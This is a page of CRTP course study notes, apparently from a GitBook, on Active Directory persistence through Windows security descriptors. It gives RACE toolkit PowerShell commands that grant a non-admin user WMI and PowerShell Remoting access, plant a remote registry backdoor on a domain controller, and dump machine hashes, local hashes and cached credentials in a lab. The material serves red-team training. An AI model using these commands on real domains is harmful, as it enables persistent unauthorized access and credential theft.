Certified Red Team Professional (CRTP) - Notes
HomeGitHubPortfolioTwitter/XMediumCont@ct
  • 📝Certified Red Team Professional (CRTP) - Notes
    • ℹ️0 - Course Summary
    • 1️⃣1 - Active Directory (AD)
      • 1.1 - Introduction to Active Directory (AD)
      • 1.2 - Physical Components of AD
      • 1.3 - Logical Components of AD
    • 2️⃣2 - PowerShell
      • 2.1 - Introduction to PowerShell
      • 2.2 - Security and Detection
    • 3️⃣3 - AD Enumeration
      • 3.1 - Host & User Identification
      • 3.2 - Common Services Enum
        • 3.2.1 - LDAP & DNS Enum
        • 3.2.2 - SMB Enum & Common Attacks
      • 3.3 - Domain Enumeration
        • 3.3.1 - PowerView
          • 3.3.1.1 - Domain Enumeration (Video Lab)
        • 3.3.2 - BloodHound
    • 4️⃣4 - Trust and Privileges Mapping
      • 4.1 - Access Control (ACL/ACE)
      • 4.2 - Group Policy
      • 4.3 - Trusts
    • 5️⃣5 - Local Privilege Escalation
      • 5.1 - Privilege Escalation
        • 5.1.1 - Feature Abuse
        • 5.1.2 - Relaying
        • 5.1.3 - GPO Abuse
        • 5.1.4 - Unquoted Service Path
      • 5.2 - Tools
    • 7️⃣6 - Lateral Movement
      • 6.1 - PowerShell Remoting & Tradecraft
      • 6.2 - Credentials Extraction & Mimikatz
    • 9️⃣7 - Kerberos Attack and Privelege Escalation
      • 7.1 - Kerberos Intro
      • 7.2 - User Enum in Kerberos
      • 7.3 - AS-REP Roasting
      • 7.4 - Kerberoasting
      • 7.5 - Kerberos Delegation
        • Uncostrained Delegation
        • Constrained Delegation
      • 7.6 - Accross Trusts
        • Page
        • External Trust
        • Forest
        • Domain Trust
    • 8️⃣8 - Persistence
      • 8.1 - Golden Ticket
      • 8.2 - Silver Ticket
      • 8.3 - Diamond Ticket
      • 8.4 - Skeleton Key
      • 8.5 - DSRM
      • 8.6 - Custom SSP
      • 8.7 - Persistence via ACLs
        • 8.7.1 - AdminSDHolder
        • 8.7.2 - DCSync Attack
        • 8.7.3 - Security Descriptors
    • 9️⃣9 - Detection and Defense
    • Lab
      • 0 - Lab Instructions
      • 1 - LO 1️
      • 2 - LO2️
      • 3 - LO 3️
      • 4 - LO 4️
      • 5 - LO 5️
      • 6 - LO 6️
      • 7 - LO 7️
      • 8 - LO8️
      • 9 - LO9️
      • 10 - LO1️0️
      • 11 - LO1️1️
      • 12 - LO1️2️
      • 13 - LO1️3️
      • 14 - LO1️4️
      • 15 - LO1️5️
      • 16 - LO1️6️
      • 17 - LO1️7️
      • 18 - LO1️8️
      • 19 - LO1️9️
      • 20 - LO2️0️
      • 21 - LO2️1️
      • 22 - LO 2️2️
      • 23 - LO2️3️
    • 📄Report
      • How to write a PT Report
  • 🛣️RoadMap / Exam Preparation
  • 📔CRTP Cheat Sheet
Powered by GitBook
On this page
  • Security Descriptors
  • Labs
  1. Certified Red Team Professional (CRTP) - Notes
  2. 8 - Persistence
  3. 8.7 - Persistence via ACLs

8.7.3 - Security Descriptors

Security Descriptors

Security Descriptors define access control for securable objects in Windows (e.g., services, WMI namespaces, registry keys). The format is described using SDDL (Security Descriptor Definition Language). SDDL strings are built from Access Control Entries (ACEs), which follow this structure:

ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid

Example ACE for built-in administrators on WMI namespaces:

A;CI;CCDCLCSWRPWPRCWD;;;SID

This ACE grants administrators full control over WMI resources.


Using RACE Toolkit for Security Descriptor Abuse

You can abuse security descriptors to grant non-admin users access to protected resources. The RACE toolkit simplifies this process:

Load the toolkit:

. C:\AD\Tools\RACE-master\RACE.ps1

Modify WMI Security Descriptors

  • On the local machine:

Set-RemoteWMI -SamAccountName student1 -Verbose
  • On a remote machine without credentials:

Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
  • On a remote machine with credentials:

Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose
  • To remove permissions from the remote machine:

Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose

Persistence via PowerShell Remoting Descriptors

Note: PS Remoting backdoors via ACLs became unstable after August 2020 patches.

  • 🔸 On the local machine:

Set-RemotePSRemoting -SamAccountName student1 -Verbose
  • 🔸 On a remote machine:

Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Verbose
  • 🔸 To remove remoting access:

Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Remove

Persistence via Remote Registry Descriptors

Using RACE or DAMP, you can grant registry access to users and retrieve sensitive hashes:

  • 🔸 Add a backdoor via Remote Registry:

Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose
  • 🔸 As student1, dump the machine account hash:

Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
  • 🔸 Retrieve local account hashes:

Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
  • 🔸 Retrieve domain cached credentials:

Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose

Labs

Previous8.7.2 - DCSync AttackNext9 - Detection and Defense

Last updated 2 days ago

📝
8️⃣
Learning Object 13 lab